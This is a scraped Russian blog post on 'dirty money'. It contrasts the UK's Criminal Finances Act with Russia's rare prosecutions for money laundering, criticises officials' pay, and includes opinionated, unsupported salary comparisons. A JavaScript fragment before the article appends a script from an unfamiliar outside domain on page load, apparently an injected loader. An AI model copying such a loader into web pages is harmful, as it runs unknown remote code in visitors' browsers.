, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Великобритания осознала вред «грязных денег», а Россия?

23 мая

Что такое «грязные деньги»?

Прежде всего, это деньги, полученные нечестным путём, добытые обманом, мошенничеством или вымогательством.

Кроме того, это наворованные государственные активы, осевшие в карманах и на счетах отдельных лиц, находящихся на верхушке властной пирамиды.

Несмотря на то, что в странах Европы и США более сорока лет на законодательном уровне  ведётся борьба с отмыванием незаконных доходов,   Комитет по международным делам британского парламента только сейчас осознал http://www.mk.ru/politics/2018/05/21/velikobritaniya-pozhalovalas-na-gryaznye-dengi-iz-rf.html , что деньги Российской Федерации, спрятанные в активах Соединенного Королевства и отмываемые через лондонский Сити, наносят ущерб действиям правительства Великобритании.

Принятый в прошлом году закон о криминальных финансах (The Criminal Finances Act 2017) позволяет уполномоченным правоохранительным органам принимать меры к лишению собственности лиц, имеющих активы, не соразмерные их известному доходу.

А, что же в России?

Более двадцати лет в России существует уголовная ответственность за легализацию (отмывание) денежных средств или иного имущества, приобретённых незаконным путём (статья 174 УК РФ).

Анализ практики применения этой нормы удручает — осуждаются единицы.

Более шести лет в стране действует п.п. 8 п. 2 ст. 235 ГК РФ, позволяющий изымать у чиновников активы, не соразмерные их известному доходу. Но за все эти годы данная норма применялась не более 40 раз.

Но для миллионов россиян, получающих пенсии и зарплаты за свой труд в размере 7−10 тыс. руб. особую актуальность получают активы, осевшие  в карманах и на счетах отдельных лиц, находящихся на верхушке властной пирамиды, в результате получения из бюджета страны необоснованно завышенных заработных плат.

Ненормальной следует считать ситуацию, когда депутаты и министры получают денежное довольствие в 20−30 раз превышающее среднюю зарплату и пенсию по стране. А если их доходы сравнивать с миллионами работающих и получающих за свой труд  не более 10−15 тыс. руб., то разница в оплате возрастает до 100 раз.

В странах Европы и США чиновники, а самое главное народ, понимает, что получать из  бюджета такие доходы просто неприлично. Поэтому зарплата чиновника в Европе только в 2−4 раза выше средней по стране. А в США сенатор получает денежное содержание, которое не может превышать среднюю зарплату по стране более 8 раз.

Понятно, что проголосовавших за гаранта Конституции Путина 76,6% от 67,47% избирателей, что составляет 56,2 миллиона голосов, это не волнует. Но мне, ветерану труда, имеющему непрерывный трудовой стаж в 55 лет, за Державу обидно.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.